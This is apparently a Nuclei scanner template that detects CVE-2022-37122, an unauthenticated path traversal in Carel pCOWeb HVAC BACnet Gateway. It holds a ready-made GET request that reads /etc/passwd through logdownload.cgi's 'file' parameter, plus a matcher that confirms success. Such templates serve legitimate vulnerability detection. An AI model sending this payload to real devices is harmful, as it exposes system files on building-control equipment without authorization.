id: CVE-2022-37122
info:
  name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Path Traversal
  author: gy741
  severity: high
  description: |
    Carel pCOWeb HVAC BACnet Gateway 2.1.0 contains an unauthenticated arbitrary file disclosure caused by improper verification of the 'file' GET parameter in logdownload.cgi, letting attackers disclose sensitive files via directory traversal, exploit requires no authentication.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php
    - https://www.zeroscience.mk/codes/carelpco_dir.txt
    - https://packetstormsecurity.com/files/167684/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37122
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-37122
    cwe-id: CWE-22
    epss-score: 0.53074
    epss-percentile: 0.97828
  metadata:
    max-request: 1
    vendor: carel
    product: pcoweb_hvac_bacnet_gateway
  tags: cve,cve2022,carel,lfi,traversal,unauth,bacnet,vuln
http:
  - method: GET
    path:
      - "{{BaseURL}}/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd"
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 490a0046304402205796cf0140a3abf449b0faa382824d0a0ebf29abb300f48c5d6d305b3c8900dd022076650bca15de0f0569d8af093d94ac7dce95ec6d6d5e018e0b411747690f84a6:922c64590222798bb761d5b6d8e72950